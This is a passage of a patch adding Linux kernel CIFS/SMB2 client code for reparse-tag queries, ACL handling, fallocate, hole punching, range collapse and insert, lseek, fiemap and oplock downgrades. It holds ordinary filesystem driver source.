++		   struct cifs_sb_info *cifs_sb, const char *full_path,
++		   __u32 *tag)
++{
++	int rc;
++	__le16 *utf16_path = NULL;
++	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++	struct TCP_Server_Info *server = cifs_pick_channel(tcon->ses);
++	int flags = CIFS_CP_CREATE_CLOSE_OP;
++	struct smb_rqst rqst[3];
++	int resp_buftype[3];
++	struct kvec rsp_iov[3];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct kvec io_iov[SMB2_IOCTL_IOV_SIZE];
++	struct kvec close_iov[1];
++	struct smb2_ioctl_rsp *ioctl_rsp;
++	struct reparse_data_buffer *reparse_buf;
++	u32 plen;
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, full_path);
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	memset(rqst, 0, sizeof(rqst));
++	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
++	memset(rsp_iov, 0, sizeof(rsp_iov));
++
++	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	/*
++	 * setup smb2open - TODO add optimization to call cifs_get_readable_path
++	 * to see if there is a handle already open that we can use
++	 */
++	memset(&open_iov, 0, sizeof(open_iov));
++	rqst[0].rq_iov = open_iov;
++	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = full_path,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[0], &oplock, &oparms, utf16_path);
++	if (rc)
++		goto query_rp_exit;
++	smb2_set_next_command(tcon, &rqst[0]);
++
++
++	/* IOCTL */
++	memset(&io_iov, 0, sizeof(io_iov));
++	rqst[1].rq_iov = io_iov;
++	rqst[1].rq_nvec = SMB2_IOCTL_IOV_SIZE;
++
++	rc = SMB2_ioctl_init(tcon, server,
++			     &rqst[1], COMPOUND_FID,
++			     COMPOUND_FID, FSCTL_GET_REPARSE_POINT, NULL, 0,
++			     CIFSMaxBufSize -
++			     MAX_SMB2_CREATE_RESPONSE_SIZE -
++			     MAX_SMB2_CLOSE_RESPONSE_SIZE);
++	if (rc)
++		goto query_rp_exit;
++
++	smb2_set_next_command(tcon, &rqst[1]);
++	smb2_set_related(&rqst[1]);
++
++
++	/* Close */
++	memset(&close_iov, 0, sizeof(close_iov));
++	rqst[2].rq_iov = close_iov;
++	rqst[2].rq_nvec = 1;
++
++	rc = SMB2_close_init(tcon, server,
++			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
++	if (rc)
++		goto query_rp_exit;
++
++	smb2_set_related(&rqst[2]);
++
++	rc = compound_send_recv(xid, tcon->ses, server,
++				flags, 3, rqst,
++				resp_buftype, rsp_iov);
++
++	ioctl_rsp = rsp_iov[1].iov_base;
++
++	/*
++	 * Open was successful and we got an ioctl response.
++	 */
++	if (rc == 0) {
++		/* See MS-FSCC 2.3.23 */
++
++		reparse_buf = (struct reparse_data_buffer *)
++			((char *)ioctl_rsp +
++			 le32_to_cpu(ioctl_rsp->OutputOffset));
++		plen = le32_to_cpu(ioctl_rsp->OutputCount);
++
++		if (plen + le32_to_cpu(ioctl_rsp->OutputOffset) >
++		    rsp_iov[1].iov_len) {
++			cifs_tcon_dbg(FYI, "srv returned invalid ioctl len: %d\n",
++				 plen);
++			rc = -EIO;
++			goto query_rp_exit;
++		}
++		*tag = le32_to_cpu(reparse_buf->ReparseTag);
++	}
++
++ query_rp_exit:
++	kfree(utf16_path);
++	SMB2_open_free(&rqst[0]);
++	SMB2_ioctl_free(&rqst[1]);
++	SMB2_close_free(&rqst[2]);
++	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
++	return rc;
++}
++
++static struct cifs_ntsd *
++get_smb2_acl_by_fid(struct cifs_sb_info *cifs_sb,
++		    const struct cifs_fid *cifsfid, u32 *pacllen, u32 info)
++{
++	struct cifs_ntsd *pntsd = NULL;
++	unsigned int xid;
++	int rc = -EOPNOTSUPP;
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++
++	if (IS_ERR(tlink))
++		return ERR_CAST(tlink);
++
++	xid = get_xid();
++	cifs_dbg(FYI, "trying to get acl\n");
++
++	rc = SMB2_query_acl(xid, tlink_tcon(tlink), cifsfid->persistent_fid,
++			    cifsfid->volatile_fid, (void **)&pntsd, pacllen,
++			    info);
++	free_xid(xid);
++
++	cifs_put_tlink(tlink);
++
++	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
++	if (rc)
++		return ERR_PTR(rc);
++	return pntsd;
++
++}
++
++static struct cifs_ntsd *
++get_smb2_acl_by_path(struct cifs_sb_info *cifs_sb,
++		     const char *path, u32 *pacllen, u32 info)
++{
++	struct cifs_ntsd *pntsd = NULL;
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	unsigned int xid;
++	int rc;
++	struct cifs_tcon *tcon;
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	__le16 *utf16_path;
++
++	cifs_dbg(FYI, "get smb3 acl for path %s\n", path);
++	if (IS_ERR(tlink))
++		return ERR_CAST(tlink);
++
++	tcon = tlink_tcon(tlink);
++	xid = get_xid();
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (!utf16_path) {
++		rc = -ENOMEM;
++		free_xid(xid);
++		return ERR_PTR(rc);
++	}
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = path,
++		.desired_access = READ_CONTROL,
++		.disposition = FILE_OPEN,
++		/*
++		 * When querying an ACL, even if the file is a symlink
++		 * we want to open the source not the target, and so
++		 * the protocol requires that the client specify this
++		 * flag when opening a reparse point
++		 */
++		.create_options = cifs_create_options(cifs_sb, 0) |
++				  OPEN_REPARSE_POINT,
++		.fid = &fid,
++	};
++
++	if (info & SACL_SECINFO)
++		oparms.desired_access |= SYSTEM_SECURITY;
++
++	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL, NULL,
++		       NULL);
++	kfree(utf16_path);
++	if (!rc) {
++		rc = SMB2_query_acl(xid, tlink_tcon(tlink), fid.persistent_fid,
++				    fid.volatile_fid, (void **)&pntsd, pacllen,
++				    info);
++		SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++	}
++
++	cifs_put_tlink(tlink);
++	free_xid(xid);
++
++	cifs_dbg(FYI, "%s: rc = %d ACL len %d\n", __func__, rc, *pacllen);
++	if (rc)
++		return ERR_PTR(rc);
++	return pntsd;
++}
++
++static int
++set_smb2_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
++		struct inode *inode, const char *path, int aclflag)
++{
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	unsigned int xid;
++	int rc, access_flags = 0;
++	struct cifs_tcon *tcon;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink = cifs_sb_tlink(cifs_sb);
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	__le16 *utf16_path;
++
++	cifs_dbg(FYI, "set smb3 acl for path %s\n", path);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++
++	tcon = tlink_tcon(tlink);
++	xid = get_xid();
++
++	if (aclflag & CIFS_ACL_OWNER || aclflag & CIFS_ACL_GROUP)
++		access_flags |= WRITE_OWNER;
++	if (aclflag & CIFS_ACL_SACL)
++		access_flags |= SYSTEM_SECURITY;
++	if (aclflag & CIFS_ACL_DACL)
++		access_flags |= WRITE_DAC;
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (!utf16_path) {
++		rc = -ENOMEM;
++		free_xid(xid);
++		return rc;
++	}
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = access_flags,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
++
++	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
++		       NULL, NULL);
++	kfree(utf16_path);
++	if (!rc) {
++		rc = SMB2_set_acl(xid, tlink_tcon(tlink), fid.persistent_fid,
++			    fid.volatile_fid, pnntsd, acllen, aclflag);
++		SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++	}
++
++	cifs_put_tlink(tlink);
++	free_xid(xid);
++	return rc;
++}
++
++/* Retrieve an ACL from the server */
++static struct cifs_ntsd *
++get_smb2_acl(struct cifs_sb_info *cifs_sb,
++	     struct inode *inode, const char *path,
++	     u32 *pacllen, u32 info)
++{
++	struct cifs_ntsd *pntsd = NULL;
++	struct cifsFileInfo *open_file = NULL;
++
++	if (inode && !(info & SACL_SECINFO))
++		open_file = find_readable_file(CIFS_I(inode), true);
++	if (!open_file || (info & SACL_SECINFO))
++		return get_smb2_acl_by_path(cifs_sb, path, pacllen, info);
++
++	pntsd = get_smb2_acl_by_fid(cifs_sb, &open_file->fid, pacllen, info);
++	cifsFileInfo_put(open_file);
++	return pntsd;
++}
++
++static long smb3_zero_data(struct file *file, struct cifs_tcon *tcon,
++			     loff_t offset, loff_t len, unsigned int xid)
++{
++	struct cifsFileInfo *cfile = file->private_data;
++	struct file_zero_data_information fsctl_buf;
++
++	cifs_dbg(FYI, "Offset %lld len %lld\n", offset, len);
++
++	fsctl_buf.FileOffset = cpu_to_le64(offset);
++	fsctl_buf.BeyondFinalZero = cpu_to_le64(offset + len);
++
++	return SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			  cfile->fid.volatile_fid, FSCTL_SET_ZERO_DATA,
++			  (char *)&fsctl_buf,
++			  sizeof(struct file_zero_data_information),
++			  0, NULL, NULL);
++}
++
++static long smb3_zero_range(struct file *file, struct cifs_tcon *tcon,
++			    loff_t offset, loff_t len, bool keep_size)
++{
++	struct cifs_ses *ses = tcon->ses;
++	struct inode *inode = file_inode(file);
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++	struct cifsFileInfo *cfile = file->private_data;
++	long rc;
++	unsigned int xid;
++	__le64 eof;
++
++	xid = get_xid();
++
++	trace_smb3_zero_enter(xid, cfile->fid.persistent_fid, tcon->tid,
++			      ses->Suid, offset, len);
++
++	inode_lock(inode);
++	filemap_invalidate_lock(inode->i_mapping);
++
++	/*
++	 * We zero the range through ioctl, so we need remove the page caches
++	 * first, otherwise the data may be inconsistent with the server.
++	 */
++	truncate_pagecache_range(inode, offset, offset + len - 1);
++
++	/* if file not oplocked can't be sure whether asking to extend size */
++	rc = -EOPNOTSUPP;
++	if (keep_size == false && !CIFS_CACHE_READ(cifsi))
++		goto zero_range_exit;
++
++	rc = smb3_zero_data(file, tcon, offset, len, xid);
++	if (rc < 0)
++		goto zero_range_exit;
++
++	/*
++	 * do we also need to change the size of the file?
++	 */
++	if (keep_size == false && i_size_read(inode) < offset + len) {
++		eof = cpu_to_le64(offset + len);
++		rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
++				  cfile->fid.volatile_fid, cfile->pid, &eof);
++	}
++
++ zero_range_exit:
++	filemap_invalidate_unlock(inode->i_mapping);
++	inode_unlock(inode);
++	free_xid(xid);
++	if (rc)
++		trace_smb3_zero_err(xid, cfile->fid.persistent_fid, tcon->tid,
++			      ses->Suid, offset, len, rc);
++	else
++		trace_smb3_zero_done(xid, cfile->fid.persistent_fid, tcon->tid,
++			      ses->Suid, offset, len);
++	return rc;
++}
++
++static long smb3_punch_hole(struct file *file, struct cifs_tcon *tcon,
++			    loff_t offset, loff_t len)
++{
++	struct inode *inode = file_inode(file);
++	struct cifsFileInfo *cfile = file->private_data;
++	struct file_zero_data_information fsctl_buf;
++	long rc;
++	unsigned int xid;
++	__u8 set_sparse = 1;
++
++	xid = get_xid();
++
++	inode_lock(inode);
++	/* Need to make file sparse, if not already, before freeing range. */
++	/* Consider adding equivalent for compressed since it could also work */
++	if (!smb2_set_sparse(xid, tcon, cfile, inode, set_sparse)) {
++		rc = -EOPNOTSUPP;
++		goto out;
++	}
++
++	filemap_invalidate_lock(inode->i_mapping);
++	/*
++	 * We implement the punch hole through ioctl, so we need remove the page
++	 * caches first, otherwise the data may be inconsistent with the server.
++	 */
++	truncate_pagecache_range(inode, offset, offset + len - 1);
++
++	cifs_dbg(FYI, "Offset %lld len %lld\n", offset, len);
++
++	fsctl_buf.FileOffset = cpu_to_le64(offset);
++	fsctl_buf.BeyondFinalZero = cpu_to_le64(offset + len);
++
++	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			cfile->fid.volatile_fid, FSCTL_SET_ZERO_DATA,
++			(char *)&fsctl_buf,
++			sizeof(struct file_zero_data_information),
++			CIFSMaxBufSize, NULL, NULL);
++	filemap_invalidate_unlock(inode->i_mapping);
++out:
++	inode_unlock(inode);
++	free_xid(xid);
++	return rc;
++}
++
++static int smb3_simple_fallocate_write_range(unsigned int xid,
++					     struct cifs_tcon *tcon,
++					     struct cifsFileInfo *cfile,
++					     loff_t off, loff_t len,
++					     char *buf)
++{
++	struct cifs_io_parms io_parms = {0};
++	int nbytes;
++	int rc = 0;
++	struct kvec iov[2];
++
++	io_parms.netfid = cfile->fid.netfid;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.persistent_fid = cfile->fid.persistent_fid;
++	io_parms.volatile_fid = cfile->fid.volatile_fid;
++
++	while (len) {
++		io_parms.offset = off;
++		io_parms.length = len;
++		if (io_parms.length > SMB2_MAX_BUFFER_SIZE)
++			io_parms.length = SMB2_MAX_BUFFER_SIZE;
++		/* iov[0] is reserved for smb header */
++		iov[1].iov_base = buf;
++		iov[1].iov_len = io_parms.length;
++		rc = SMB2_write(xid, &io_parms, &nbytes, iov, 1);
++		if (rc)
++			break;
++		if (nbytes > len)
++			return -EINVAL;
++		buf += nbytes;
++		off += nbytes;
++		len -= nbytes;
++	}
++	return rc;
++}
++
++static int smb3_simple_fallocate_range(unsigned int xid,
++				       struct cifs_tcon *tcon,
++				       struct cifsFileInfo *cfile,
++				       loff_t off, loff_t len)
++{
++	struct file_allocated_range_buffer in_data, *out_data = NULL, *tmp_data;
++	u32 out_data_len;
++	char *buf = NULL;
++	loff_t l;
++	int rc;
++
++	in_data.file_offset = cpu_to_le64(off);
++	in_data.length = cpu_to_le64(len);
++	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			cfile->fid.volatile_fid,
++			FSCTL_QUERY_ALLOCATED_RANGES,
++			(char *)&in_data, sizeof(in_data),
++			1024 * sizeof(struct file_allocated_range_buffer),
++			(char **)&out_data, &out_data_len);
++	if (rc)
++		goto out;
++
++	buf = kzalloc(1024 * 1024, GFP_KERNEL);
++	if (buf == NULL) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	tmp_data = out_data;
++	while (len) {
++		/*
++		 * The rest of the region is unmapped so write it all.
++		 */
++		if (out_data_len == 0) {
++			rc = smb3_simple_fallocate_write_range(xid, tcon,
++					       cfile, off, len, buf);
++			goto out;
++		}
++
++		if (out_data_len < sizeof(struct file_allocated_range_buffer)) {
++			rc = -EINVAL;
++			goto out;
++		}
++
++		if (off < le64_to_cpu(tmp_data->file_offset)) {
++			/*
++			 * We are at a hole. Write until the end of the region
++			 * or until the next allocated data,
++			 * whichever comes next.
++			 */
++			l = le64_to_cpu(tmp_data->file_offset) - off;
++			if (len < l)
++				l = len;
++			rc = smb3_simple_fallocate_write_range(xid, tcon,
++					       cfile, off, l, buf);
++			if (rc)
++				goto out;
++			off = off + l;
++			len = len - l;
++			if (len == 0)
++				goto out;
++		}
++		/*
++		 * We are at a section of allocated data, just skip forward
++		 * until the end of the data or the end of the region
++		 * we are supposed to fallocate, whichever comes first.
++		 */
++		l = le64_to_cpu(tmp_data->length);
++		if (len < l)
++			l = len;
++		off += l;
++		len -= l;
++
++		tmp_data = &tmp_data[1];
++		out_data_len -= sizeof(struct file_allocated_range_buffer);
++	}
++
++ out:
++	kfree(out_data);
++	kfree(buf);
++	return rc;
++}
++
++
++static long smb3_simple_falloc(struct file *file, struct cifs_tcon *tcon,
++			    loff_t off, loff_t len, bool keep_size)
++{
++	struct inode *inode;
++	struct cifsInodeInfo *cifsi;
++	struct cifsFileInfo *cfile = file->private_data;
++	long rc = -EOPNOTSUPP;
++	unsigned int xid;
++	__le64 eof;
++
++	xid = get_xid();
++
++	inode = d_inode(cfile->dentry);
++	cifsi = CIFS_I(inode);
++
++	trace_smb3_falloc_enter(xid, cfile->fid.persistent_fid, tcon->tid,
++				tcon->ses->Suid, off, len);
++	/* if file not oplocked can't be sure whether asking to extend size */
++	if (!CIFS_CACHE_READ(cifsi))
++		if (keep_size == false) {
++			trace_smb3_falloc_err(xid, cfile->fid.persistent_fid,
++				tcon->tid, tcon->ses->Suid, off, len, rc);
++			free_xid(xid);
++			return rc;
++		}
++
++	/*
++	 * Extending the file
++	 */
++	if ((keep_size == false) && i_size_read(inode) < off + len) {
++		rc = inode_newsize_ok(inode, off + len);
++		if (rc)
++			goto out;
++
++		if (cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE)
++			smb2_set_sparse(xid, tcon, cfile, inode, false);
++
++		eof = cpu_to_le64(off + len);
++		rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
++				  cfile->fid.volatile_fid, cfile->pid, &eof);
++		if (rc == 0) {
++			cifsi->server_eof = off + len;
++			cifs_setsize(inode, off + len);
++			cifs_truncate_page(inode->i_mapping, inode->i_size);
++			truncate_setsize(inode, off + len);
++		}
++		goto out;
++	}
++
++	/*
++	 * Files are non-sparse by default so falloc may be a no-op
++	 * Must check if file sparse. If not sparse, and since we are not
++	 * extending then no need to do anything since file already allocated
++	 */
++	if ((cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE) == 0) {
++		rc = 0;
++		goto out;
++	}
++
++	if (keep_size == true) {
++		/*
++		 * We can not preallocate pages beyond the end of the file
++		 * in SMB2
++		 */
++		if (off >= i_size_read(inode)) {
++			rc = 0;
++			goto out;
++		}
++		/*
++		 * For fallocates that are partially beyond the end of file,
++		 * clamp len so we only fallocate up to the end of file.
++		 */
++		if (off + len > i_size_read(inode)) {
++			len = i_size_read(inode) - off;
++		}
++	}
++
++	if ((keep_size == true) || (i_size_read(inode) >= off + len)) {
++		/*
++		 * At this point, we are trying to fallocate an internal
++		 * regions of a sparse file. Since smb2 does not have a
++		 * fallocate command we have two otions on how to emulate this.
++		 * We can either turn the entire file to become non-sparse
++		 * which we only do if the fallocate is for virtually
++		 * the whole file,  or we can overwrite the region with zeroes
++		 * using SMB2_write, which could be prohibitevly expensive
++		 * if len is large.
++		 */
++		/*
++		 * We are only trying to fallocate a small region so
++		 * just write it with zero.
++		 */
++		if (len <= 1024 * 1024) {
++			rc = smb3_simple_fallocate_range(xid, tcon, cfile,
++							 off, len);
++			goto out;
++		}
++
++		/*
++		 * Check if falloc starts within first few pages of file
++		 * and ends within a few pages of the end of file to
++		 * ensure that most of file is being forced to be
++		 * fallocated now. If so then setting whole file sparse
++		 * ie potentially making a few extra pages at the beginning
++		 * or end of the file non-sparse via set_sparse is harmless.
++		 */
++		if ((off > 8192) || (off + len + 8192 < i_size_read(inode))) {
++			rc = -EOPNOTSUPP;
++			goto out;
++		}
++	}
++
++	smb2_set_sparse(xid, tcon, cfile, inode, false);
++	rc = 0;
++
++out:
++	if (rc)
++		trace_smb3_falloc_err(xid, cfile->fid.persistent_fid, tcon->tid,
++				tcon->ses->Suid, off, len, rc);
++	else
++		trace_smb3_falloc_done(xid, cfile->fid.persistent_fid, tcon->tid,
++				tcon->ses->Suid, off, len);
++
++	free_xid(xid);
++	return rc;
++}
++
++static long smb3_collapse_range(struct file *file, struct cifs_tcon *tcon,
++			    loff_t off, loff_t len)
++{
++	int rc;
++	unsigned int xid;
++	struct inode *inode = file_inode(file);
++	struct cifsFileInfo *cfile = file->private_data;
++	struct cifsInodeInfo *cifsi = CIFS_I(inode);
++	__le64 eof;
++	loff_t old_eof;
++
++	xid = get_xid();
++
++	inode_lock(inode);
++
++	old_eof = i_size_read(inode);
++	if ((off >= old_eof) ||
++	    off + len >= old_eof) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++	filemap_invalidate_lock(inode->i_mapping);
++	rc = filemap_write_and_wait_range(inode->i_mapping, off, old_eof - 1);
++	if (rc < 0)
++		goto out_2;
++
++	truncate_pagecache_range(inode, off, old_eof);
++
++	rc = smb2_copychunk_range(xid, cfile, cfile, off + len,
++				  old_eof - off - len, off);
++	if (rc < 0)
++		goto out_2;
++
++	eof = cpu_to_le64(old_eof - len);
++	rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
++			  cfile->fid.volatile_fid, cfile->pid, &eof);
++	if (rc < 0)
++		goto out_2;
++
++	rc = 0;
++
++	cifsi->server_eof = i_size_read(inode) - len;
++	truncate_setsize(inode, cifsi->server_eof);
++	fscache_resize_cookie(cifs_inode_cookie(inode), cifsi->server_eof);
++out_2:
++	filemap_invalidate_unlock(inode->i_mapping);
++ out:
++	inode_unlock(inode);
++	free_xid(xid);
++	return rc;
++}
++
++static long smb3_insert_range(struct file *file, struct cifs_tcon *tcon,
++			      loff_t off, loff_t len)
++{
++	int rc;
++	unsigned int xid;
++	struct cifsFileInfo *cfile = file->private_data;
++	struct inode *inode = file_inode(file);
++	__le64 eof;
++	__u64  count, old_eof;
++
++	xid = get_xid();
++
++	inode_lock(inode);
++
++	old_eof = i_size_read(inode);
++	if (off >= old_eof) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++	count = old_eof - off;
++	eof = cpu_to_le64(old_eof + len);
++
++	filemap_invalidate_lock(inode->i_mapping);
++	rc = filemap_write_and_wait_range(inode->i_mapping, off, old_eof + len - 1);
++	if (rc < 0)
++		goto out_2;
++	truncate_pagecache_range(inode, off, old_eof);
++
++	rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
++			  cfile->fid.volatile_fid, cfile->pid, &eof);
++	if (rc < 0)
++		goto out_2;
++
++	rc = smb2_copychunk_range(xid, cfile, cfile, off, count, off + len);
++	if (rc < 0)
++		goto out_2;
++
++	rc = smb3_zero_data(file, tcon, off, len, xid);
++	if (rc < 0)
++		goto out_2;
++
++	rc = 0;
++out_2:
++	filemap_invalidate_unlock(inode->i_mapping);
++ out:
++	inode_unlock(inode);
++	free_xid(xid);
++	return rc;
++}
++
++static loff_t smb3_llseek(struct file *file, struct cifs_tcon *tcon, loff_t offset, int whence)
++{
++	struct cifsFileInfo *wrcfile, *cfile = file->private_data;
++	struct cifsInodeInfo *cifsi;
++	struct inode *inode;
++	int rc = 0;
++	struct file_allocated_range_buffer in_data, *out_data = NULL;
++	u32 out_data_len;
++	unsigned int xid;
++
++	if (whence != SEEK_HOLE && whence != SEEK_DATA)
++		return generic_file_llseek(file, offset, whence);
++
++	inode = d_inode(cfile->dentry);
++	cifsi = CIFS_I(inode);
++
++	if (offset < 0 || offset >= i_size_read(inode))
++		return -ENXIO;
++
++	xid = get_xid();
++	/*
++	 * We need to be sure that all dirty pages are written as they
++	 * might fill holes on the server.
++	 * Note that we also MUST flush any written pages since at least
++	 * some servers (Windows2016) will not reflect recent writes in
++	 * QUERY_ALLOCATED_RANGES until SMB2_flush is called.
++	 */
++	wrcfile = find_writable_file(cifsi, FIND_WR_ANY);
++	if (wrcfile) {
++		filemap_write_and_wait(inode->i_mapping);
++		smb2_flush_file(xid, tcon, &wrcfile->fid);
++		cifsFileInfo_put(wrcfile);
++	}
++
++	if (!(cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE)) {
++		if (whence == SEEK_HOLE)
++			offset = i_size_read(inode);
++		goto lseek_exit;
++	}
++
++	in_data.file_offset = cpu_to_le64(offset);
++	in_data.length = cpu_to_le64(i_size_read(inode));
++
++	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			cfile->fid.volatile_fid,
++			FSCTL_QUERY_ALLOCATED_RANGES,
++			(char *)&in_data, sizeof(in_data),
++			sizeof(struct file_allocated_range_buffer),
++			(char **)&out_data, &out_data_len);
++	if (rc == -E2BIG)
++		rc = 0;
++	if (rc)
++		goto lseek_exit;
++
++	if (whence == SEEK_HOLE && out_data_len == 0)
++		goto lseek_exit;
++
++	if (whence == SEEK_DATA && out_data_len == 0) {
++		rc = -ENXIO;
++		goto lseek_exit;
++	}
++
++	if (out_data_len < sizeof(struct file_allocated_range_buffer)) {
++		rc = -EINVAL;
++		goto lseek_exit;
++	}
++	if (whence == SEEK_DATA) {
++		offset = le64_to_cpu(out_data->file_offset);
++		goto lseek_exit;
++	}
++	if (offset < le64_to_cpu(out_data->file_offset))
++		goto lseek_exit;
++
++	offset = le64_to_cpu(out_data->file_offset) + le64_to_cpu(out_data->length);
++
++ lseek_exit:
++	free_xid(xid);
++	kfree(out_data);
++	if (!rc)
++		return vfs_setpos(file, offset, inode->i_sb->s_maxbytes);
++	else
++		return rc;
++}
++
++static int smb3_fiemap(struct cifs_tcon *tcon,
++		       struct cifsFileInfo *cfile,
++		       struct fiemap_extent_info *fei, u64 start, u64 len)
++{
++	unsigned int xid;
++	struct file_allocated_range_buffer in_data, *out_data;
++	u32 out_data_len;
++	int i, num, rc, flags, last_blob;
++	u64 next;
++
++	rc = fiemap_prep(d_inode(cfile->dentry), fei, start, &len, 0);
++	if (rc)
++		return rc;
++
++	xid = get_xid();
++ again:
++	in_data.file_offset = cpu_to_le64(start);
++	in_data.length = cpu_to_le64(len);
++
++	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
++			cfile->fid.volatile_fid,
++			FSCTL_QUERY_ALLOCATED_RANGES,
++			(char *)&in_data, sizeof(in_data),
++			1024 * sizeof(struct file_allocated_range_buffer),
++			(char **)&out_data, &out_data_len);
++	if (rc == -E2BIG) {
++		last_blob = 0;
++		rc = 0;
++	} else
++		last_blob = 1;
++	if (rc)
++		goto out;
++
++	if (out_data_len && out_data_len < sizeof(struct file_allocated_range_buffer)) {
++		rc = -EINVAL;
++		goto out;
++	}
++	if (out_data_len % sizeof(struct file_allocated_range_buffer)) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++	num = out_data_len / sizeof(struct file_allocated_range_buffer);
++	for (i = 0; i < num; i++) {
++		flags = 0;
++		if (i == num - 1 && last_blob)
++			flags |= FIEMAP_EXTENT_LAST;
++
++		rc = fiemap_fill_next_extent(fei,
++				le64_to_cpu(out_data[i].file_offset),
++				le64_to_cpu(out_data[i].file_offset),
++				le64_to_cpu(out_data[i].length),
++				flags);
++		if (rc < 0)
++			goto out;
++		if (rc == 1) {
++			rc = 0;
++			goto out;
++		}
++	}
++
++	if (!last_blob) {
++		next = le64_to_cpu(out_data[num - 1].file_offset) +
++		  le64_to_cpu(out_data[num - 1].length);
++		len = len - (next - start);
++		start = next;
++		goto again;
++	}
++
++ out:
++	free_xid(xid);
++	kfree(out_data);
++	return rc;
++}
++
++static long smb3_fallocate(struct file *file, struct cifs_tcon *tcon, int mode,
++			   loff_t off, loff_t len)
++{
++	/* KEEP_SIZE already checked for by do_fallocate */
++	if (mode & FALLOC_FL_PUNCH_HOLE)
++		return smb3_punch_hole(file, tcon, off, len);
++	else if (mode & FALLOC_FL_ZERO_RANGE) {
++		if (mode & FALLOC_FL_KEEP_SIZE)
++			return smb3_zero_range(file, tcon, off, len, true);
++		return smb3_zero_range(file, tcon, off, len, false);
++	} else if (mode == FALLOC_FL_KEEP_SIZE)
++		return smb3_simple_falloc(file, tcon, off, len, true);
++	else if (mode == FALLOC_FL_COLLAPSE_RANGE)
++		return smb3_collapse_range(file, tcon, off, len);
++	else if (mode == FALLOC_FL_INSERT_RANGE)
++		return smb3_insert_range(file, tcon, off, len);
++	else if (mode == 0)
++		return smb3_simple_falloc(file, tcon, off, len, false);
++
++	return -EOPNOTSUPP;
++}
++
++static void
++smb2_downgrade_oplock(struct TCP_Server_Info *server,
++		      struct cifsInodeInfo *cinode, __u32 oplock,
++		      unsigned int epoch, bool *purge_cache)
++{
++	server->ops->set_oplock_level(cinode, oplock, 0, NULL);
++}
++
++static void
++smb21_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
++		       unsigned int epoch, bool *purge_cache);
++
++static void
++smb3_downgrade_oplock(struct TCP_Server_Info *server,
++		       struct cifsInodeInfo *cinode, __u32 oplock,
++		       unsigned int epoch, bool *purge_cache)
++{
++	unsigned int old_state = cinode->oplock;
++	unsigned int old_epoch = cinode->epoch;
++	unsigned int new_state;
++
++	if (epoch > old_epoch) {
++		smb21_set_oplock_level(cinode, oplock, 0, NULL);
++		cinode->epoch = epoch;
++	}
++
++	new_state = cinode->oplock;
++	*purge_cache = false;
++
++	if ((old_state & CIFS_CACHE_READ_FLG) != 0 &&
++	    (new_state & CIFS_CACHE_READ_FLG) == 0)
++		*purge_cache = true;
++	else if (old_state == new_state && (epoch - old_epoch > 1))
++		*purge_cache = true;
++}
++
++static void
++smb2_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
++		      unsigned int epoch, bool *purge_cache)
++{
++	oplock &= 0xFF;
++	cinode->lease_granted = false;
++	if (oplock == SMB2_OPLOCK_LEVEL_NOCHANGE)
++		return;
